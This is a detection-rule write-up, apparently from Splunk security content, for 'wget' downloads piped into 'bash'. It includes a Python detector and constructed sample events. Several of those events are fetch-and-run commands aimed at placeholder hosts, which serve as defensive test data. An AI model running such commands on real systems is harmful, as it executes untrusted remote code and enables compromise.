
Wget Download and Bash Execution

Splunk Security Content

Summary
This analytic rule detects potentially malicious use of the `wget` command on Windows, Linux, and macOS systems to download a file from a remote location and pipe it directly into `bash` for execution. This behavior is important to monitor because it is commonly associated with malware distribution and exploitation attempts, notably post-exploitation activity following CVE-2021-44228 (the Log4j vulnerability). The detection analyzes event logs collected by Endpoint Detection and Response (EDR) agents, specifically process execution events and their command-line arguments. By identifying `wget` invocations that combine a quiet-mode flag with output redirected to `bash`, the rule can flag and alert on suspicious activity that could lead to system compromise or unauthorized data access.
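The following Python is an added illustration of the rule's logic, not Splunk's own search: it models EDR process events as small records and checks each command line for the three ingredients the summary names (a `wget` invocation, a quiet flag, and output written to stdout that is piped into `bash`), including the bundled `-qO-` form and a pipeline nested inside `bash -c "..."`. The event fields (`host`, `user`, `parent_process`, `process`), hostnames and URLs are constructed placeholders.

```python
"""Added example detector for 'wget quiet download piped into bash'.

Not Splunk's search logic; the rule is re-expressed in Python over
constructed EDR process events so it can be run and tested offline.
"""
import shlex
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    user: str
    parent_process: str
    process: str  # full command line as recorded by the EDR agent (assumed field layout)


@dataclass(frozen=True)
class Finding:
    host: str
    user: str
    process: str
    reason: str


SHELLS = {"bash"}  # the rule keys on bash; add "sh"/"zsh" here if you generalize it
PIPE = "|"
OTHER_OPERATORS = {"||", "&&", ";", "&"}


def tokenize(cmdline: str) -> List[str]:
    """Split a command line into words and shell operator tokens ('|', '&&', ...)."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True  # keep URLs (with ':') as single words
    return list(lexer)


def split_pipelines(tokens: List[str]) -> List[List[List[str]]]:
    """Group tokens into pipelines; each pipeline is a list of stages split on '|'."""
    pipelines: List[List[List[str]]] = [[[]]]
    for tok in tokens:
        if tok == PIPE:
            pipelines[-1].append([])   # next stage of the same pipeline
        elif tok in OTHER_OPERATORS:
            pipelines.append([[]])     # ';', '&&', ... start a new pipeline
        else:
            pipelines[-1][-1].append(tok)
    return pipelines


def basename(tok: str) -> str:
    return tok.rsplit("/", 1)[-1]


def wget_output_flags(stage: List[str]) -> Tuple[bool, bool]:
    """Return (quiet, to_stdout) for a wget stage, handling bundled short options like -qO-."""
    quiet = to_stdout = False
    i = 1
    while i < len(stage):
        tok = stage[i]
        if tok in ("-q", "--quiet"):
            quiet = True
        elif tok == "--output-document=-":
            to_stdout = True
        elif tok in ("-O", "--output-document"):
            to_stdout = to_stdout or (i + 1 < len(stage) and stage[i + 1] == "-")
            i += 1  # skip the output target
        elif tok.startswith("-") and not tok.startswith("--"):
            letters = tok[1:]
            if "q" in letters:
                quiet = True
            if "O" in letters:
                target = letters.split("O", 1)[1]  # text glued after O, e.g. '-' in -qO-
                if target == "-":
                    to_stdout = True
                elif target == "":
                    to_stdout = to_stdout or (i + 1 < len(stage) and stage[i + 1] == "-")
                    i += 1
        i += 1
    return quiet, to_stdout


def analyze_cmdline(cmdline: str) -> Optional[str]:
    """Return a reason string if the command line matches the rule, else None."""
    for pipeline in split_pipelines(tokenize(cmdline)):
        for idx, stage in enumerate(pipeline):
            if not stage:
                continue
            head = basename(stage[0])
            if head in SHELLS and "-c" in stage:
                # bash -c "<command>": the real pipeline lives inside the quoted argument
                c_pos = stage.index("-c")
                if c_pos + 1 < len(stage):
                    nested = analyze_cmdline(stage[c_pos + 1])
                    if nested:
                        return nested
            if head == "wget":
                quiet, to_stdout = wget_output_flags(stage)
                piped_to_shell = any(s and basename(s[0]) in SHELLS for s in pipeline[idx + 1:])
                if quiet and to_stdout and piped_to_shell:
                    return "wget quiet download written to stdout and piped into bash"
    return None


def detect(events: List[ProcessEvent]) -> List[Finding]:
    """Run the rule over a batch of process events and return the matches."""
    return [Finding(ev.host, ev.user, ev.process, reason)
            for ev in events
            for reason in [analyze_cmdline(ev.process)] if reason]


# Constructed sample events (placeholder hosts, users and URLs; not real telemetry)
SAMPLE_EVENTS = [
    ProcessEvent("lnx-web-01", "www-data", "/bin/sh",
                 "wget -q -O - http://203.0.113.10/setup.sh | bash"),
    ProcessEvent("mac-dev-07", "jdoe", "/bin/zsh",
                 "/usr/local/bin/wget -qO- https://example.invalid/s.sh | /bin/bash"),
    ProcessEvent("lnx-app-03", "tomcat", "/usr/bin/java",
                 'bash -c "wget --quiet --output-document=- http://203.0.113.10/a.sh | bash"'),
    ProcessEvent("lnx-build-02", "ci", "/bin/bash",
                 "wget -q https://mirror.example.invalid/pkg.tar.gz -O /tmp/pkg.tar.gz"),
    ProcessEvent("lnx-ops-05", "ops", "/bin/bash",
                 "wget -q -O - https://example.invalid/report.txt | grep -c error"),
    ProcessEvent("lnx-web-01", "www-data", "/bin/sh",
                 "curl -s http://203.0.113.10/x.sh | bash"),  # curl is outside this rule's scope
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f.host}] user={f.user}: {f.reason}\n    {f.process}")
```

Running the block flags the first three sample events and leaves the file download to disk, the pipe into `grep`, and the `curl` variant alone; the last one is a useful reminder that this rule is specific to `wget`, so a sibling rule is needed for `curl`-based equivalents. Tokenizing with `shlex` rather than substring matching is what keeps the `bash -c "..."` case and the bundled `-qO-` form from slipping past the check.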
Categories
  • Endpoint
  • Linux
  • macOS
  • Windows
Data Sources
  • Windows Registry
  • Process
  • Command
  • Application Log
ATT&CK Techniques
  • T1105
Created: 2024-12-10